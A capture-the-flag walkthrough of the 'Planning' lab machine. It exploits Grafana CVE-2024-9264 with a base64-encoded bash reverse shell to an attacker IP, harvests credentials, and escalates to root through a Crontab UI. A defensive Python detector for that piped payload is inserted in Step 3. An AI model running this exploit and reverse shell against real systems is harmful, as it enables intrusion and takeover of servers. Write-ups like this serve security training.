# Step 1: IP Enumeration

Scan finds a website on the machine. Only HTTP and SSH are open; no other services.

# Step 2: Website Enumeration

Website’s a dead end. Run ffuf for directories:

```plaintext
$ ffuf -u http://planning.htb/FUZZ -w ./wordlists/dirbuster/directory-list-2.3-medium.txt -c -t 50
```

No hits. A subdomain scan reveals Grafana at http://grafana.planning.htb. Log in with admin/0D5oT70Fq13EvB5r. The instance is vulnerable to CVE-2024-9264: Grafana SQL Expressions RCE.

# Step 3: CVE-2024-9264 Reverse Shell

Test the exploit:

```plaintext
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c whoami http://grafana.planning.htb
```

Confirms RCE. Set up Netcat listener on 10.10.14.7:5555, then run:

```plaintext
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjcvNTU1NSAwPiYx | base64 -d | bash" http://grafana.planning.htb
```

Land in a Docker environment. Check env variables:

```plaintext
root@7ce659d667d7:~# env | grep GF_SECURITY
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
```

New credentials: enzo/RioTecRANDEntANT!.
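
A defender's view of the Step 3 command, as an added example that is not part of the original write-up: the Python below flags process command lines of the form `echo <blob> | base64 -d | bash`, decodes the blob, and pulls out any `/dev/tcp` endpoint it contains. The log record layout and the function names are assumptions; the sample records are constructed, reusing the container hostname and the blob shown above.

```python
import base64
import binascii
import re

# Shape of the Step 3 command: echo <blob> | base64 -d | bash
PIPE_RE = re.compile(
    r"echo\s+['\"]?(?P<blob>[A-Za-z0-9+/]{16,}={0,2})['\"]?\s*\|\s*"
    r"base64\s+(?:-d|--decode)\s*\|\s*(?:/\S*/)?(?:ba|z|da)?sh\b")
# Bash network redirection inside the decoded text
DEVTCP_RE = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)")

# Constructed process-execution records; the field layout is an assumption.
SAMPLE_LOG = [
    "host=7ce659d667d7 user=root cmd=sh -c echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjcvNTU1NSAwPiYx | base64 -d | bash",
    "host=7ce659d667d7 user=root cmd=sh -c echo aGVsbG8gd29ybGQ= | base64 -d > /tmp/motd",
    "host=7ce659d667d7 user=grafana cmd=grafana server --homepath=/usr/share/grafana",
]


def inspect_cmdline(cmdline):
    """Return a finding dict if cmdline pipes a base64 blob into a shell, else None."""
    m = PIPE_RE.search(cmdline)
    if not m:
        return None
    blob = m.group("blob")
    try:
        # Re-pad in case the blob was written without trailing '='.
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    net = DEVTCP_RE.search(text)
    return {
        "decoded": text,
        "interactive_shell": bool(re.search(r"\b(?:ba)?sh\s+-i\b", text)),
        "remote": (net.group("host"), int(net.group("port"))) if net else None,
    }


def scan(lines):
    """Return (line, finding) pairs for records whose cmd= field trips the detector."""
    pairs = ((line, inspect_cmdline(line.partition("cmd=")[2])) for line in lines)
    return [(line, f) for line, f in pairs if f]


if __name__ == "__main__":
    for line, f in scan(SAMPLE_LOG):
        print(f["remote"], "interactive" if f["interactive_shell"] else "", line)
```

A decode that is only redirected to a file, like the second record, is not flagged; a blob piped into a shell without a network endpoint is still reported, with `remote` set to `None`.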

# Step 4: SSH to User

SSH as enzo with RioTecRANDEntANT!. Grab the user flag.

# Step 5: Privilege Escalation

Upload LinPEAS. Find /opt/crontabs/crontab.db with credentials root/P4ssw0rd (not the system root user). LinPEAS lists a service listening on 127.0.0.1:8000. Forward the port:

```plaintext
ssh -L 8000:localhost:8000 enzo@planning.htb
```

# Step 6: Crontab UI (Root Flag)

The forwarded port reveals a Crontab UI running with root privileges. Log in with the crontab.db credentials. Add a cronjob:

```plaintext
cp /root/root.txt /tmp/flag
```

Click Run Now. Root flag secured.
